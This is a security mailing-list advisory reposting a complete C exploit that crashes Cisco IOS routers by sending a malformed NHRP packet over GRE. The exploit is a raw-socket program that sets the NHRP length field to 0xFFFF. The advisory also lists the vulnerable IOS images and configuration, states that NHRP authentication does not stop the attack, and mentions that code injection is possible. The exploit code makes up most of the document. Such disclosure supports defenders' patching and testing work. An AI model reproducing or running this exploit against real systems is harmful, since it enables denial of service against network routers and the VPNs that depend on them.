The following security advisory is sent to the securiteam mailing list, and can
be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - -
Cisco IOS Next Hop Resolution Protocol DoS (NHRP, Exploit)
------------------------------------------------------------------------
SUMMARY
NHRP is "basically a query-and-reply protocol and all parties through
which reply information passes build a 'network knowledge table' that can
be used for all subsequent traffic".
A vulnerability in Cisco IOS allows remote denial of service, the
following exploit code can be used to test it.
DETAILS
This DoS exploit addresses the recent NHRP bug in Cisco IOS (CSCin95836 /
cisco-sa-20070808-nhrp). The original advisory can be found here:
<http://www.cisco.com/en/US/products/products_security_advisory09186a008089963b.shtml>
http://www.cisco.com/en/US/products/products_security_advisory09186a008089963b.shtml
Exploit:
/******************************************************************************/
/*
*/
/* nhrp-dos - Copyright by Martin Kluge, <mk@elxsi.de>
*/
/*
*/
/* Feel free to modify this code as you like, as long as you include the
*/
/* above copyright statement.
*/
/*
*/
/* Please use this code only to check your OWN cisco routers.
*/
/*
*/
/* Cisco bug ID: CSCin95836
*/
/*
*/
/* The Next-Hop-Resolution Protocol (NHRP) is defined in RFC2332. It is
used */
/* by a source host/router connected to a Non-Broadcast-Multi-Access
(NBMA) */
/* subnetwork to determine the internetworking layer address and NBMA
*/
/* subnetwork addresses of the NBMA next hop towards the destination.
*/
/* NHRP is often used for dynamic multipoint VPNs (DMVPN) in combination
with */
/* IPSEC.
*/
/*
*/
/* URLs:
*/
/* - [RFC2332/NHRP] http://rfc.net/rfc2332.html
*/
/* - [RFC1701/GRE] http://rfc.net/rfc1701.html
*/
/* - [DMVPNs with Cisco]
http://www.cisco.com/en/US/tech/tk583/tk372/techno */
/* logies_white_paper09186a008018983e.shtml
*/
/*
*/
/* This code was only tested on FreeBSD and Linux, no warranty is or will
be */
/* provided.
*/
/*
*/
/* Vulnerable images (tested):
*/
/*
*/
/* - c7100-jk9o3s-mz.123-12e.bin
*/
/* - c7200-jk8o3s-mz.122-40.bin
*/
/* - c3640-js-mz.122-15.T17.bin
*/
/* (and many other IOS versions on different platforms)
*/
/*
*/
/* Vulnerable configuration on cisco IOS:
*/
/*
*/
/* interface Tunnel0
*/
/* ip address 10.0.0.1 255.255.255.128
*/
/* no ip redirects
*/
/* no ip proxy-arp
*/
/* ip mtu 1464
*/
/* ip nhrp authentication mysecret
*/
/* ip nhrp network-id 1000
*/
/* ip nhrp map multicast dynamic
*/
/* ip nhrp server-only
*/
/* ip nhrp holdtime 30
*/
/* tunnel source FastEthernet0/0
*/
/* tunnel mode gre multipoint
*/
/* tunnel key 123456789
*/
/*
*/
/* This exploit works even if "ip nhrp authentication" is configured on
the */
/* cisco router. You can also specify a GRE key (use 0 to disable this
*/
/* feature) if the GRE tunnel is protected. You don't need to know the
*/
/* NHRP network id (or any other configuration details, except the GRE key
if */
/* it is set on the target router).
*/
/*
*/
/* NOTE: The exploit only seems to work, if a NHRP session between the
target */
/* router and at least one client is established.
*/
/*
*/
/* Code injection is also possible (thanks to sky for pointing this out),
but */
/* it is not very easy and depends heavily on the IOS version / platform.
*/
/*
*/
/* Example:
*/
/* root@elxsi# ./nhrp-dos vr0 x.x.x.x 123456789
*/
/*
*/
/* Router console output:
*/
/*
*/
/* -Traceback= 605D89A0 605D6B50 605BD974 605C08CC 605C2598 605C27E8
*/
/* $0 : 00000000, AT : 62530000, v0 : 62740000, v1 : 62740000
*/
/* <snip>
*/
/* EPC : 605D89A0, ErrorEPC : BFC01654, SREG : 3400FF03
*/
/* Cause 00000024 (Code 0x9): Breakpoint exception
*/
/*
*/
/* Writing crashinfo to bootflash:crashinfo_20070321-155011
*/
/* === Flushing messages (16:50:12 CET Wed Mar 21 2007) ===
*/
/*
*/
/* Router reboots or sometimes hangs ;)
*/
/*
*/
/*
*/
/* Workaround: Disable NHRP ;)
*/
/*
*/
/* I'd like to thank the Cisco PSIRT and Clay Seaman-Kossmey for their
help */
/* regarding this issue.
*/
/*
*/
/* Greetings fly to: sky, chilli, arbon, ripp, huega, gh0st, argonius,
s0uls, */
/* xhr, bullet, nanoc, spekul, kaner, d, slobo, conny,
H-Ra */
/* and #infiniteVOID
*/
/*
*/
/******************************************************************************/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <netdb.h>
#include <arpa/inet.h>
#include <sys/socket.h>
#include <sys/ioctl.h>
#include <net/if.h>
#include <netinet/in.h>
#include <netinet/in_systm.h>
#include <netinet/ip.h>
/* BSD */
#define _BSD
/* Header sizes */
#define IP_HDR_SIZE 20
#define GRE_HDR_SIZE 4
#define GRE_KEY_SIZE 4
#define NHRP_HDR_SIZE 62
/* Function prototypes */
int open_socket (void);
int close_socket (int);
int send_dos(int, unsigned long, unsigned long, unsigned long);
unsigned long resolve_ip (char *);
unsigned long get_int_ipv4 (char *);
/* Globals */
int sockfd;
int nhrp_req_id;
/* GRE header */
struct gre_h {
unsigned short flags; /* GRE flags */
unsigned short ptype; /* GRE protocol type */
unsigned int key; /* GRE key */
};
/* NHRP header */
struct nhrp_h {
/* NHRP fixed header (20 bytes) */
struct {
unsigned short afn; /* NHRP AFN */
unsigned short proto; /* NHRP protocol type */
unsigned int snap; /* NHRP SNAP */
unsigned short snapE:8; /* NHRP SNAP */
unsigned short hops:8; /* NHRP hop count */
unsigned short length; /* NHRP total length */
unsigned short checksum; /* NHRP checksum */
unsigned short mpoa_ext; /* NHRP MPOA extensions */
unsigned short version:8; /* NHRP version */
unsigned short type:8; /* NHRP type */
unsigned short nbma_addr:8; /* NHRP t/l of NBMA
address */
unsigned short nbma_sub:8; /* NHRP t/l of NBMA
subaddr */
} fixed;
/* NHRP mandatory part */
struct {
unsigned short src_len:8; /* NHRP src protocol
length */
unsigned short dst_len:8; /* NHRP dest protocol
length */
unsigned short flags; /* NHRP flags */
unsigned int request_id; /* NHRP request ID */
unsigned long client_nbma; /* NHRP client NBMA
address */
unsigned long client_nbma_sub; /* NHRP client NBMA
subaddr */
unsigned long client_pro_addr; /* NHRP client protocol
addr */
} mand;
/* NHRP client information entries (CIE) */
union {
struct {
unsigned short code:8; /* NHRP code */
unsigned short pref_len:8; /* NHRP prefix
length */
unsigned short reserved; /* NHRP reserved
*/
unsigned short mtu; /* NHRP MTU */
unsigned short holding_time; /* NHRP holding
time */
unsigned short len_client:8; /* NHRP t/l cl
addr */
unsigned short len_client_sub:8;/* NHRP t/l cl sub
*/
unsigned short len_client_pro:8;/* NHRP t/l cl pro
*/
unsigned short preference:8; /* NHRP preference
*/
unsigned short ext; /* NHRP extension
*/
} cie;
};
};
/* Main function */
int main (int argc, char **argv) {
/* Check command line */
if(argc != 4) {
fprintf(stderr, "\nnhrp-dos (c) by Martin Kluge
<mk@elxsi.de>, 2007\n");
fprintf(stderr,
"------------------------------------------------\n");
fprintf(stderr, "Usage: ./nhrp-dos <device> <target> <GRE
key>\n");
fprintf(stderr, "(Set GRE key = 0 to disable GRE
keys!)\n\n");
exit(EXIT_FAILURE);
}
/* Check UID */
if(getuid() != 0 && geteuid() != 0) {
fprintf(stderr, "Error: Please run as root!\n");
exit(EXIT_FAILURE);
}
/* Open a socket */
sockfd = open_socket();
/* Send DoS packet */
send_dos(sockfd, get_int_ipv4(argv[1]), resolve_ip(argv[2]),
atoi(argv[3]));
/* Close the socket */
close_socket(sockfd);
exit(EXIT_SUCCESS);
}
/* Open the socket */
int open_socket (void)
{
int fd;
int one = 1;
void *ptr = &one;
/* Open the socket */
fd = socket(AF_INET, SOCK_RAW, IPPROTO_UDP);
if(fd < 0) {
fprintf(stderr, "Error: open_socket: Unable to open
socket.\n");
exit(EXIT_FAILURE);
}
/* Set IP_HDRINCL to include the IPv4 header in outgoing packets.
*/
/* Otherwise it would be done by the kernel. */
if(setsockopt(fd, IPPROTO_IP, IP_HDRINCL, ptr, sizeof(one)) < 0) {
fprintf(stderr, "Error: open_socket: setsockopt
failed.\n");
exit(EXIT_FAILURE);
}
#ifndef _BSD
if(setsockopt(fd, IPPROTO_IP, SO_BROADCAST, ptr, sizeof(one)) < 0)
{
fprintf(stderr,"Error: open_socket: setsockopt
failed.\n");
exit(EXIT_FAILURE);
}
#endif
return(fd);
}
/* Close the socket */
int close_socket (int fd)
{
return(close(fd));
}
/* Resolve the hostname to IP address */
unsigned long resolve_ip (char *host)
{
struct in_addr addr;
struct hostent *host_ent;
if((addr.s_addr = inet_addr(host)) == -1) {
if(!(host_ent = gethostbyname(host)))
return(-1);
memcpy((char *)&addr.s_addr, host_ent->h_addr,
host_ent->h_length);
}
return(addr.s_addr);
}
/* Get IPv4 address of DEVICE */
unsigned long get_int_ipv4 (char *device)
{
int tmp_fd;
struct ifreq ifr;
struct sockaddr_in *sin;
tmp_fd = socket(PF_INET, SOCK_DGRAM, 0);
if(tmp_fd < 0) {
fprintf(stderr, "Error: get_int_ipv4: socket failed.\n");
exit(EXIT_FAILURE);
}
memset(&ifr, 0, sizeof(ifr));
sin = (struct sockaddr_in *) &ifr.ifr_addr;
strncpy(ifr.ifr_name, device, sizeof(ifr.ifr_name));
ifr.ifr_addr.sa_family = AF_INET;
if(ioctl(tmp_fd, SIOCGIFADDR, (char *) &ifr) < 0) {
fprintf(stderr, "Error: get_int_ipv4: ioctl failed.\n");
exit(EXIT_FAILURE);
}
close(tmp_fd);
return(sin->sin_addr.s_addr);
}
/* Send NHRP packet */
int send_dos (int fd, unsigned long src_ip, unsigned long dst_ip,
unsigned long gre_key)
{
struct ip ip_hdr;
struct ip *iphdr;
struct gre_h gre_hdr;
struct nhrp_h nhrp_hdr;
struct sockaddr_in sin;
unsigned int bytes = 0;
int GRE_SIZE = GRE_HDR_SIZE;
/* Packet buffer */
unsigned char *buf;
if(gre_key!=0)
GRE_SIZE+=GRE_KEY_SIZE;
/* Allocate some memory */
buf = malloc(IP_HDR_SIZE+GRE_SIZE+NHRP_HDR_SIZE);
if(buf < 0) {
fprintf(stderr, "Error: send_dos: malloc failed.\n");
exit(EXIT_FAILURE);
}
/* Increment NHRP request ID */
nhrp_req_id++;
/* IPv4 Header */
ip_hdr.ip_v = 4; /* IP version */
ip_hdr.ip_hl = 5; /* IP header
length */
ip_hdr.ip_tos = 0x00; /* IP ToS */
ip_hdr.ip_len = htons(IP_HDR_SIZE +
GRE_SIZE +
NHRP_HDR_SIZE
); /* IP total length
*/
ip_hdr.ip_id = 0; /* IP
identification */
ip_hdr.ip_off = 0; /* IP frag offset
*/
ip_hdr.ip_ttl = 64; /* IP time to live
*/
ip_hdr.ip_p = IPPROTO_GRE; /* IP protocol */
ip_hdr.ip_sum = 0; /* IP checksum */
ip_hdr.ip_src.s_addr = src_ip; /* IP source */
ip_hdr.ip_dst.s_addr = dst_ip; /* IP destination
*/
/* GRE header */
if(gre_key != 0) {
gre_hdr.flags = htons(0x2000); /* GRE flags */
gre_hdr.key = htonl(gre_key); /* GRE key */
} else {
gre_hdr.flags = 0;
}
gre_hdr.ptype = htons(0x2001); /* GRE type (NHRP)
*/
/* NHRP fixed header */
nhrp_hdr.fixed.afn = htons(0x0001); /* NHRP AFN */
nhrp_hdr.fixed.proto = htons(0x0800); /* NHRP protocol
type */
nhrp_hdr.fixed.snap = 0; /* NHRP SNAP */
nhrp_hdr.fixed.snapE = 0; /* NHRP SNAP */
nhrp_hdr.fixed.hops = 0xFF; /* NHRP hop count
*/
/* DoS -> Set length to 0xFFFF */
nhrp_hdr.fixed.length = htons(0xFFFF); /* NHRP length */
/* Checksum can be incorrect */
nhrp_hdr.fixed.checksum = 0; /* NHRP checksum
*/
nhrp_hdr.fixed.mpoa_ext = htons(0x0034); /* NHRP MPOA ext
*/
nhrp_hdr.fixed.version = 1; /* NHRP version */
nhrp_hdr.fixed.type = 3; /* NHRP type */
nhrp_hdr.fixed.nbma_addr= 4; /* NHRP NBMA t/l
addr */
nhrp_hdr.fixed.nbma_sub = 0; /* NHRP NBMA t/l
sub */
/* NHRP mandatory part */
nhrp_hdr.mand.src_len = 4; /* NHRP src proto
len */
nhrp_hdr.mand.dst_len = 4; /* NHRP dst proto
len */
nhrp_hdr.mand.flags = htons(0x8000); /* NHRP flags */
nhrp_hdr.mand.request_id = htonl(nhrp_req_id); /* NHRP request ID
*/
nhrp_hdr.mand.client_nbma = src_ip; /* NHRP client
addr */
nhrp_hdr.mand.client_nbma_sub = 0; /* NHRP client sub
*/
nhrp_hdr.mand.client_pro_addr = 0; /* NHRP client
proto */
/* NHRP client information entries (CIE) */
nhrp_hdr.cie.code = 0; /* NHRP code */
nhrp_hdr.cie.pref_len = 0xFF; /* NHRP prefix len
*/
nhrp_hdr.cie.reserved = 0x0000; /* NHRP reserved
*/
nhrp_hdr.cie.mtu = htons(1514); /* NHRP mtu */
nhrp_hdr.cie.holding_time = htons(30); /* NHRP holding
time */
nhrp_hdr.cie.len_client = 0; /* NHRP t/l client
*/
nhrp_hdr.cie.len_client_sub = 0; /* NHRP t/l sub */
nhrp_hdr.cie.len_client_pro = 0; /* NHRP t/l pro */
nhrp_hdr.cie.preference = 0; /* NHRP preference
*/
nhrp_hdr.cie.ext = htons(0x8003); /* NHRP C/U/Type
(ext)*/
/* Copy the IPv4 header to the buffer */
memcpy(buf, (unsigned char *) &ip_hdr, sizeof(ip_hdr));
/* Copy the GRE header to the buffer */
memcpy(buf + IP_HDR_SIZE, (unsigned char *) &gre_hdr,
sizeof(gre_hdr));
/* Copy the NHRP header to the buffer */
memcpy(buf + IP_HDR_SIZE + GRE_SIZE, (unsigned char *) &nhrp_hdr,
sizeof(nhrp_hdr));
/* Fix some BSD bugs */
#ifdef _BSD
iphdr = (struct ip *) buf;
iphdr->ip_len = ntohs(iphdr->ip_len);
iphdr->ip_off = ntohs(iphdr->ip_off);
#endif
memset(&sin, 0, sizeof(struct sockaddr_in));
sin.sin_family = AF_INET;
sin.sin_addr.s_addr = iphdr->ip_dst.s_addr;
printf("\nnhrp-dos (c) by Martin Kluge <mk@elxsi.de>, 2007\n");
printf("------------------------------------------------\n");
printf("Sending DoS packet...");
/* Send the packet */
bytes = sendto(fd, buf, IP_HDR_SIZE + GRE_SIZE + NHRP_HDR_SIZE, 0,
(struct sockaddr *) &sin, sizeof(struct
sockaddr));
printf("DONE (%d bytes)\n\n", bytes);
/* Free the buffer */
free(buf);
/* Return number of bytes */
return(bytes);
}
ADDITIONAL INFORMATION
The information has been provided by <mailto:mk@elxsi.de> Martin Kluge.
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to:
list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to:
list-subscribe@securiteam.com
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any
kind.
In no event shall we be liable for any damages whatsoever including direct,
indirect, incidental, consequential, loss of business profits or special
damages.
